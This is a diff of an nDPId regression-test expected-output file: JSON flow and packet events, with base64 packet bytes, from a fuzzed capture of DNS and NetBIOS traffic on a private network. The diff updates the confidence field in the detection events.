00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":194,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469985981,"flow_last_seen":1120469985981,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469985981,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2742,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":194,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":77,"flow_packet_id":1,"flow_last_seen":1120469985981,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120469985981,"pkt":"ADBUADRWAODtAW69CABFAABIalMAAIARTP7AqAECwKgBAQq2ADUANHZOs8ABAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":194,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469985981,"flow_last_seen":1120469985981,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469985981,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2742,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":194,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469985981,"flow_last_seen":1120469985981,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469985981,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2742,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":195,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469986976,"flow_last_seen":1120469986976,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469986976,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2730,"dst_port":43690,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":195,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":78,"flow_packet_id":1,"flow_last_seen":1120469986976,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120469986976,"pkt":"ADBUADRWAODtAW69CABFAABIalQAAIARTP3AqAECwKgBAQqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":196,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":77,"flow_packet_id":2,"flow_last_seen":1120469988978,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120469988978,"pkt":"ADBUADRWAODtAW69CABFAABIalUAAIARTPzAqAECwKgBAQq2ADUANHZOs8ABAAABAAAAAAB1BF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAjAAE="} -00798{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":196,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120469985981,"flow_last_seen":1120469988978,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469988978,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2742,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":35,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00798{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":196,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120469985981,"flow_last_seen":1120469988978,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469988978,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2742,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":35,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":197,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":77,"flow_packet_id":3,"flow_last_seen":1120469990981,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120469990981,"pkt":"ADBUADRWAOLtAW69CABFAABIalYAAIARTPvAqAECwKgBAQq2ADUANHZOs8ABAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":197,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120469985981,"flow_last_seen":1120469990981,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469990981,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2742,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":197,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120469985981,"flow_last_seen":1120469990981,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469990981,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2742,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00198{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":199,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":2115,"global_ts_msec":1120470000407} 00619{"packet_event_id":1,"packet_event_name":"packet","packet_id":199,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":243,"pkt_type":2115,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":243,"pkt_l4_len":0,"thread_ts_msec":1120469994988,"pkt":"\/\/\/\/\/\/\/\/AGCXD+5yCENFAADlXL4AAIARWNHAqAEpwKgB\/wCKAIoA0SAWEQKRS8CoASkAigC7AAAgRU1FQkVDREJEQkRCQ0FDQUNBQ0FDQUNBQ0FDQUNBQ0EAIEbuRVBGQ0VMRUhGQ0VQRkZGQUNBQyVzAENBQ0FDQUJOAP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQAAIQAAAAAAAAAAAOgDAAAAAAAAAAAhAFYAAwABAAAAAgAyAFxNQUlxU0xPVFxCUk9XU0UAAQCA\/AoATEFCMTExAAAAAA+y781oIgUBAxAAAA8BVaoA"} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":200,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470002989,"flow_last_seen":1120470002989,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470002989,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2743,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":200,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":79,"flow_packet_id":1,"flow_last_seen":1120470002989,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1120470002989,"pkt":"ADBUADRWAODtAW69CABFAABEalgAAIARTP3AqAECwKgBAQq3ADUAMKhFfMIAAAABAAAAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAQ=="} -00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":200,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470002989,"flow_last_seen":1120470002989,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470002989,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2743,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":200,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470002989,"flow_last_seen":1120470002989,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470002989,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2743,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":201,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":79,"flow_packet_id":2,"flow_last_seen":1120470002991,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1120470002991,"pkt":"AODtAW69ADBUADRWCABFAABbAABAAEARtz7AqAEBwKgBAgA1CrcAR4rBfMKAAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAAQAAJxAACwlsb2NhbChvc3QA"} -00796{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":201,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470002989,"flow_last_seen":1120470002991,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120470002991,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2743,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}} +00796{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":201,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470002989,"flow_last_seen":1120470002991,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120470002991,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2743,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":205,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470015072,"flow_last_seen":1120470015072,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470015072,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2744,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":205,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":80,"flow_packet_id":1,"flow_last_seen":1120470015072,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470015072,"pkt":"ADBUADRWAODtQW69CABFAABIaloAAIARTPfAqAECwKgBAQq4ADUANOBJScMBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":205,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470015072,"flow_last_seen":1120470015072,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470015072,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2744,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":205,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470015072,"flow_last_seen":1120470015072,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470015072,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2744,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":206,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":80,"flow_packet_id":2,"flow_last_seen":1120470016067,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470016067,"pkt":"ADBUADRWAODtAW69CABFAABIalsAAIARTPbAqAECwKgBAQq4ADUANOBJScMBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":208,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":80,"flow_packet_id":3,"flow_last_seen":1120470018070,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470018070,"pkt":"ADBUADRWAODtAW69CABFAABIamEAAIARTPDAqAECwKgBAQq4ADUAGOBJScMBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":210,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470019512,"flow_last_seen":1120470019512,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470019512,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":88,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00524{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":210,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":81,"flow_packet_id":1,"flow_last_seen":1120470019512,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1120470019512,"pkt":"\/\/\/\/\/\/\/\/AODtAW69CABFAABOamMAAIARS+rAqAECwKgB\/wBYAIkAOluMhQ8BEAABAAAAAAAAIEVGRURFSkZQRUVFUEVORUJFSkVPQ0FDQUNBQ0FDQUJNAAEgAAE="} -00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":210,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470019512,"flow_last_seen":1120470019512,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470019512,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":88,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":210,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470019512,"flow_last_seen":1120470019512,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470019512,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":88,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00613{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":213,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469839664,"flow_last_seen":1120469839664,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470024079,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00598{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":213,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469839664,"flow_last_seen":1120469839664,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470024079,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":213,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120469828958,"flow_last_seen":1120469828958,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470024079,"l3_proto":"ip4","src_ip":"192.168.1.202","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":213,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120469828958,"flow_last_seen":1120469828958,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470024079,"l3_proto":"ip4","src_ip":"192.168.1.202","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":213,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120469831652,"flow_last_seen":1120469835658,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470024079,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2732,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":213,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470032081,"flow_last_seen":1120470032081,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470032081,"l3_proto":"ip4","src_ip":"192.168.1.170","dst_ip":"170.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":213,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":82,"flow_packet_id":1,"flow_last_seen":1120470032081,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1120470032081,"pkt":"ADBUADRWAODtAW69CABFAABEamYAAIARTO\/AqAGqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":214,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470032083,"flow_last_seen":1120470032083,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470032083,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2745,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":214,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":83,"flow_packet_id":1,"flow_last_seen":1120470032083,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1120470032083,"pkt":"AODtAW69ADBUADRWCABFAABbAABAAEARtz7AqAEBwKgBAgA1CrkARxK+9MOAAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAAQAAfRAACwlsb2NhbGhvc3QA"} -00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":214,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470032083,"flow_last_seen":1120470032083,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470032083,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2745,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":12,"rsp_addr":"0.0.0.0"}} 